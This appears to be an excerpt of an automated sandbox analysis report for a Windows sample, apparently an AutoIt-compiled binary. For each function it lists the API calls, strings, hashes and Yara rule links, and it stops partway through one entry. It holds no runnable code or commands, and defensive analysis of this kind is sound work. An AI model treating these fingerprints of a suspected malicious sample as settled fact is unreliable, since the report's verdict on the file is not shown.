Function 00B6710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B67135
SafeArrayAllocData.OLEAUT32(?), ref: 00B6718E
VariantInit.OLEAUT32(?), ref: 00B671A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00B671C0
VariantCopy.OLEAUT32(?,?), ref: 00B67213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00B67227
VariantClear.OLEAUT32(?), ref: 00B6723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00B67249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B67252
VariantClear.OLEAUT32(?), ref: 00B67264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B6726F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9e58ee9aa39781966bb3890f6cb6c6700d0a676f75d2eebd8481eb4bff85fa1b
Instruction ID: 88f4724891700adaccbd47c7a65afb57bfa7ee0c7dbc9e947b0b339bc9594b9d
Opcode Fuzzy Hash: 9e58ee9aa39781966bb3890f6cb6c6700d0a676f75d2eebd8481eb4bff85fa1b
Instruction Fuzzy Hash: 0D413C35A40219AFCF00DF68D9949EEBBF9FF48354F0080AAE915E7361CB34A945CB90

Function 00B85A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B85AA6
inet_addr.WSOCK32(?,?,?), ref: 00B85AEB
gethostbyname.WSOCK32(?), ref: 00B85AF7
IcmpCreateFile.IPHLPAPI ref: 00B85B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B85B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B85B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B85C00
WSACleanup.WSOCK32 ref: 00B85C06

Strings

Ping, xrefs: 00B85B29

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 414581d3cef78fdc35b7bc6398d167eccfa98980802560e9126331db1125d8ad
Instruction ID: 4df157569a134064318b753976b56853acd444da9abb8e9d9fe3177de785056c
Opcode Fuzzy Hash: 414581d3cef78fdc35b7bc6398d167eccfa98980802560e9126331db1125d8ad
Instruction Fuzzy Hash: 58517F31604701DFDB20AF64CC85B6ABBE4EF48720F1489AAF556DB2A1DB70EC40CB56

Function 00B7B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B7B7B1
GetLastError.KERNEL32 ref: 00B7B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00B7B828

Strings

READONLY, xrefs: 00B7B7F3
UNKNOWN, xrefs: 00B7B7E0
INVALID, xrefs: 00B7B7FA
NOTREADY, xrefs: 00B7B7E7
READY, xrefs: 00B7B801

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: dbb9ddf838c8222d4134e4178c6f43151cc0ed114922c2904cb006d8eb463d9b
Instruction ID: 124a1270c2927666b03ec85284eef1becdc3509fb83f8c0fff4a900188689d09
Opcode Fuzzy Hash: dbb9ddf838c8222d4134e4178c6f43151cc0ed114922c2904cb006d8eb463d9b
Instruction Fuzzy Hash: 23318035A002099FDB14EF64C885FBE7BF8EF44714F5080AAE51AD7291DB719D42CB52

Function 00B69471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B6B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B694F6
GetDlgCtrlID.USER32 ref: 00B69501
GetParent.USER32 ref: 00B6951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B69520
GetDlgCtrlID.USER32(?), ref: 00B69529
GetParent.USER32(?), ref: 00B69545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B69548

Strings

ListBox, xrefs: 00B694B3
ComboBox, xrefs: 00B6947E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: f91c40de9678d224b12705d7f66d228c640a79ff79c7c51bfe16c2f24612fdaf
Instruction ID: f1900b21cf4a6a37f60a5b40daf9cb47283ec0cb86e824cf46d60f84286f7760
Opcode Fuzzy Hash: f91c40de9678d224b12705d7f66d228c640a79ff79c7c51bfe16c2f24612fdaf
Instruction Fuzzy Hash: 0A21D670A00204BBDF05AB64CCC5EFEBBB9EF55310F10019AB562972E1DF795959DB20

Function 00B6955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B6B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B695DF
GetDlgCtrlID.USER32 ref: 00B695EA
GetParent.USER32 ref: 00B69606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B69609
GetDlgCtrlID.USER32(?), ref: 00B69612
GetParent.USER32(?), ref: 00B6962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B69631

Strings

ListBox, xrefs: 00B6959E
ComboBox, xrefs: 00B69569

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 3f5b2dfd93c1c3b955c48a4ed715e4b0433e84016baecf9fa4f8b54d118d944a
Instruction ID: c5d39bc8f1896ee15df6044987a00c50d9c0766ce9b83147c193b788e2f33a82
Opcode Fuzzy Hash: 3f5b2dfd93c1c3b955c48a4ed715e4b0433e84016baecf9fa4f8b54d118d944a
Instruction Fuzzy Hash: 1221B075A40304BBDF01AB60CCC5EFEBBB9EF58310F100096B922972A1DB799959DA20

Function 00B69645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B69651
GetClassNameW.USER32(00000000,?,00000100), ref: 00B69666
_wcscmp.LIBCMT ref: 00B69678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B696F3

Strings

SHELLDLL_DefView, xrefs: 00B69672
smallicons, xrefs: 00B696BB
largeicons, xrefs: 00B69687
list, xrefs: 00B696D5
details, xrefs: 00B696A1

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 6619cb3085145caa6ba806ad88b8a3115f2f2d81a509cafe49f7574abdd0e34d
Instruction ID: 30ca3754e3d12c112b74c5f42c8d69ff0c711ecaec209a55762b8d61aac0036b
Opcode Fuzzy Hash: 6619cb3085145caa6ba806ad88b8a3115f2f2d81a509cafe49f7574abdd0e34d
Instruction Fuzzy Hash: 9511C276248307BAFB012620DC4BEA777DCDB15B70F2000EBF900E50E1FEB669519A58

Function 00B88BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B88BEC
CoInitialize.OLE32(00000000), ref: 00B88C19
CoUninitialize.OLE32 ref: 00B88C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00B88D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B88E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BA2C0C), ref: 00B88E84
CoGetObject.OLE32(?,00000000,00BA2C0C,?), ref: 00B88EA7
SetErrorMode.KERNEL32(00000000), ref: 00B88EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B88F3A
VariantClear.OLEAUT32(?), ref: 00B88F4A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: de3eeaec62c356055976123ffd54d1d3825d3c350132b628b0679a8461cf68a3
Instruction ID: 95ee44fdd0bfcd0321f84ada68cfc691608e87d09dd2a1de04196514186bf5cd
Opcode Fuzzy Hash: de3eeaec62c356055976123ffd54d1d3825d3c350132b628b0679a8461cf68a3
Instruction Fuzzy Hash: 05C10171208305AFC700EF68C88496AB7E9FF89748F4049ADF58A9B261DB71ED05CB52

Function 00B74189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00B7419D
__swprintf.LIBCMT ref: 00B741AA

Part of subcall function 00B338D8: __woutput_l.LIBCMT ref: 00B33931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00B741D4
LoadResource.KERNEL32(?,00000000), ref: 00B741E0
LockResource.KERNEL32(00000000), ref: 00B741ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00B7420D
LoadResource.KERNEL32(?,00000000), ref: 00B7421F
SizeofResource.KERNEL32(?,00000000), ref: 00B7422E
LockResource.KERNEL32(?), ref: 00B7423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B7429B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 81bb89d6fb5bc96ead96e07d7d640313903ed047fa5e47b50f42f8cb0217a996
Instruction ID: 99f045ce672b9eaef60c8948564f22e83dee8dbf88740e25bf4375fc7d481d0b
Opcode Fuzzy Hash: 81bb89d6fb5bc96ead96e07d7d640313903ed047fa5e47b50f42f8cb0217a996
Instruction Fuzzy Hash: E431B07160521AABCB019F60ED54EBFBBECEF04702F008566F919E3151EB70DA618BA0

Function 00B716DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B71700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B70778,?,00000001), ref: 00B71714
GetWindowThreadProcessId.USER32(00000000), ref: 00B7171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B70778,?,00000001), ref: 00B7172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B7173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B70778,?,00000001), ref: 00B71755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B70778,?,00000001), ref: 00B71767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B70778,?,00000001), ref: 00B717AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B70778,?,00000001), ref: 00B717C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B70778,?,00000001), ref: 00B717CC

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 7efebb41a0f71676dcd23a9adaa140ff6846a04fde2d023b8a679131657cad6c
Instruction ID: c0b18d1058094f8cd3a9443931d890810837462e2af4c340715aaa82963d7276
Opcode Fuzzy Hash: 7efebb41a0f71676dcd23a9adaa140ff6846a04fde2d023b8a679131657cad6c
Instruction Fuzzy Hash: 7331CEB1201304ABEB259F5CDD84BB9BBEDEB05721F1084A6F818D72A0EF709D40CB60

Function 00B1FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B1FC06
OleUninitialize.OLE32(?,00000000), ref: 00B1FCA5
UnregisterHotKey.USER32(?), ref: 00B1FDFC
DestroyWindow.USER32(?), ref: 00B54A00
FreeLibrary.KERNEL32(?), ref: 00B54A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B54A92

Strings

close all, xrefs: 00B1FC01

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 9af697ca9b23d6cb80f62657e333a015763bdafb4a9f23124558fe326c66694b
Instruction ID: 8efa595f5b937b20e06933a1aa61fddca4967feafd5e3558da671e8eca8a0933
Opcode Fuzzy Hash: 9af697ca9b23d6cb80f62657e333a015763bdafb4a9f23124558fe326c66694b
Instruction Fuzzy Hash: F7A13831701212CFCB29EB14C595BB9F7E5EF04705F5442E9E80AAB261DB30AD9ACF94

Function 00B6A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00B6AA64), ref: 00B6A9A2

Strings

INSTANCE, xrefs: 00B6A8B0
CLASSNN, xrefs: 00B6A744
TEXT, xrefs: 00B6A8D9
CLASS, xrefs: 00B6A721
NAME, xrefs: 00B6A7D4
REGEXPCLASS, xrefs: 00B6A767

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 28f4c175c1ab6fa28729d21311477747c4937ff954f47375ab7c7d359d8f359f
Instruction ID: 0f194735e36b4b19a27ada68f41d35db1d71ced70167628bf9fc06522a586e8f
Opcode Fuzzy Hash: 28f4c175c1ab6fa28729d21311477747c4937ff954f47375ab7c7d359d8f359f
Instruction Fuzzy Hash: 17916171600606EADF18DF60C491BEAFBF5FF04304F6081A9D89AB7191DB346A99CF91

Function 00B12E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B12EAE

Part of subcall function 00B11DB3: GetClientRect.USER32(?,?), ref: 00B11DDC
Part of subcall function 00B11DB3: GetWindowRect.USER32(?,?), ref: 00B11E1D
Part of subcall function 00B11DB3: ScreenToClient.USER32(?,?), ref: 00B11E45

GetDC.USER32 ref: 00B4CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B4CF95
SelectObject.GDI32(00000000,00000000), ref: 00B4CFA3
SelectObject.GDI32(00000000,00000000), ref: 00B4CFB8
ReleaseDC.USER32(?,00000000), ref: 00B4CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B4D04B

Strings

U, xrefs: 00B4CF20

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3daaea1f72769b70eb9572b634f69258843eff33531f63bc8e10e8d89d8cb98c
Instruction ID: c33b081f2cd64032263b381aaa44f1ce0ccbc5a19cecc91e46b98b8a85776777
Opcode Fuzzy Hash: 3daaea1f72769b70eb9572b634f69258843eff33531f63bc8e10e8d89d8cb98c
Instruction Fuzzy Hash: 8F71BE31501205DFCF218F64C890AFA7BF6FF49320F1442AAED559B2A6D7318D95EB60

Function 00B9C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

Part of subcall function 00B12344: GetCursorPos.USER32(?), ref: 00B12357
Part of subcall function 00B12344: ScreenToClient.USER32(00BD67B0,?), ref: 00B12374
Part of subcall function 00B12344: GetAsyncKeyState.USER32(00000001), ref: 00B12399
Part of subcall function 00B12344: GetAsyncKeyState.USER32(00000002), ref: 00B123A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B9C2E4
ImageList_EndDrag.COMCTL32 ref: 00B9C2EA
ReleaseCapture.USER32 ref: 00B9C2F0
SetWindowTextW.USER32(?,00000000), ref: 00B9C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B9C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B9C48F

Strings

@GUI_DROPID, xrefs: 00B9C3E1
@GUI_DRAGFILE, xrefs: 00B9C424

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: cd2abecdcb8e0c946aca950fd106cd2cb887085c66ae78ba14741eac2c1077bd
Instruction ID: 06de2cac80cc7c941ef82300d90c0b936633a554b32dbec8aad9003d40776b18
Opcode Fuzzy Hash: cd2abecdcb8e0c946aca950fd106cd2cb887085c66ae78ba14741eac2c1077bd
Instruction Fuzzy Hash: 46519E70208345AFDB00DF24C8A5FAA7BE5FF88310F1045AEF5958B2E1DB71A958DB52

Function 00B88F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B9F910), ref: 00B8903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B9F910), ref: 00B89071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B891EB
SysFreeString.OLEAUT32(?), ref: 00B89215

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: f9198274c53cea396b6e267dfd81be95d645abf75381fab7905c10abd6d0955f
Instruction ID: 6c223390cd161add5a21dabd5e3496aec8577debf84f263a19a2bea773c99451
Opcode Fuzzy Hash: f9198274c53cea396b6e267dfd81be95d645abf75381fab7905c10abd6d0955f
Instruction Fuzzy Hash: 53F1E571A00219EFDF04EF94C888ABEB7B9FF49314F148499E515AB2A1DB31AE45CB50

Function 00B8F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B8F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B8FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B8FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B8FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B8FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B8FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B8FD90
CloseHandle.KERNEL32(?), ref: 00B8FDBF
CloseHandle.KERNEL32(?), ref: 00B8FE36

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
